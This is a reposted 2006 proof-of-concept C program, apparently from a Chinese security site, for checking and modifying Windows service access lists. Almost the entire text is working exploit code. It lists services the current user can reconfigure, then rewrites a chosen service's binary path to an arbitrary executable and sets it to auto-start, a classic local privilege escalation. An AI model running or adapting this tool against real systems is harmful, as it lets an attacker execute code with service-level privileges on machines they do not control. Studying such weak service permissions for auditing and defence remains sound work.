MS Windows Services Access List Checker / Modifier PoC
时间:2006-2-4 13:54:33 出处:网络 作者:未知 编辑:mervin 点击数:
int main(int argc, char* argv[])
{
SC_HANDLE SCM;
LPENUM_SERVICE_STATUS_PROCESS lpServices;
unsigned int n;
DWORD nSize = 0;
DWORD nServicesReturned;
DWORD nResumeHandle;
DWORD dwServiceType;
SC_HANDLE Svc;
LPQUERY_SERVICE_CONFIG lpConfig;
DWORD dwByteNeeded;
char SrvName[256],SrvDesc[256];
BYTE LIST=0;
unsigned int l=0;
printf(" Services Permissions checker\n");
printf(" (c) 2006 Andres Tarasco - atarasco _at_ gmail.com\n\n");
if ( ( (argc==1) || (argc>5) ) ||
( (argc==2) && (strcmp(argv[1],"-l")!=0) ) ||
( (argc==4) && (strcmp(argv[1],"-m")!=0) )
) {
printf("Usage:\n\t-l (list vulnerable services)\n");
printf("\t-m SRVNAME NewPath (change the configuration for that service)\n");
exit(1);
}
if (argv[1][1]=='l') {
LIST=1;
SCM = OpenSCManager(NULL,NULL,SC_MANAGER_ENUMERATE_SERVICE);
}else {
SCM = OpenSCManager(NULL,NULL,STANDARD_RIGHTS_WRITE);
}
if (!SCM){
printf("OpenScManager FAILED\n");
doFormatMessage(GetLastError());
exit(-1);
}
if (LIST) {
nResumeHandle = 0;
dwServiceType = SERVICE_WIN32 | SERVICE_DRIVER;
lpServices = (LPENUM_SERVICE_STATUS_PROCESS) LocalAlloc(LPTR, 65535);
if (!lpServices) {
printf("LocalAlloc Failed\n");
exit(-1);
}
memset(lpServices,'\0',sizeof(lpServices));
if (EnumServicesStatusEx(SCM, SC_ENUM_PROCESS_INFO,
dwServiceType, SERVICE_STATE_ALL,
(LPBYTE)lpServices, 65535,
&nSize, &nServicesReturned,
&nResumeHandle, NULL) == 0) {
printf("EnumServicesStatusEx FAILED\n");
exit(-1);
}
for (n = 0; n < nServicesReturned; n++) {
Svc = OpenService(SCM,lpServices[n].lpServiceName, SERVICE_CHANGE_CONFIG | SC_MANAGER_ENUMERATE_SERVICE |GENERIC_READ);
if (Svc!=NULL) {
l++;
printf("[%s]\t\t%s\n",lpServices[n].lpServiceName, lpServices[n].lpDisplayName);
printf("Status: 0x%x\n",lpServices[n].ServiceStatusProcess.dwCurrentState);
dwByteNeeded = 0;
lpConfig = (LPQUERY_SERVICE_CONFIG) LocalAlloc(LPTR, 1024);
if (QueryServiceConfig(Svc, lpConfig, 1024, &dwByteNeeded)!=0) {
printf("Path: %s\n\n",lpConfig->lpBinaryPathName);
}else {
doFormatMessage(GetLastError());
}
}
}
} else {
Svc = OpenService(SCM,argv[2],SERVICE_CHANGE_CONFIG | STANDARD_RIGHTS_WRITE);
if (Svc!=NULL) {
if (ChangeServiceConfig(
Svc,
SERVICE_NO_CHANGE,
SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,
argv[3],
NULL,
NULL,
"",
NULL,
NULL,
NULL)!=0) {
printf("service modified =)\n");
} else {
printf("modification failed\n");
}
} else {
printf("Unable to open Service %s\n",argv[2]);
}
}
if ( (LIST) && (l>0) ) {
printf("\n You were Lucky. %i services found\n",l);
} else {
printf("\No luck\n");
}
CloseServiceHandle(SCM);
LocalFree(lpServices);
return(1);
}
void doFormatMessage( unsigned int dwLastErr ) {
char cadena[512];
LPVOID lpMsgBuf;
FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_IGNORE_INSERTS |
FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
dwLastErr,
MAKELANGID( LANG_NEUTRAL, SUBLANG_DEFAULT ),
(LPTSTR) &lpMsgBuf,
0,
NULL );
sprintf(cadena,"ERRORCODE %i: %s\n", dwLastErr, lpMsgBuf);
printf("Error: %s\n",cadena);
LocalFree( lpMsgBuf );
}
-
相关文章
相关文章
EMAIL: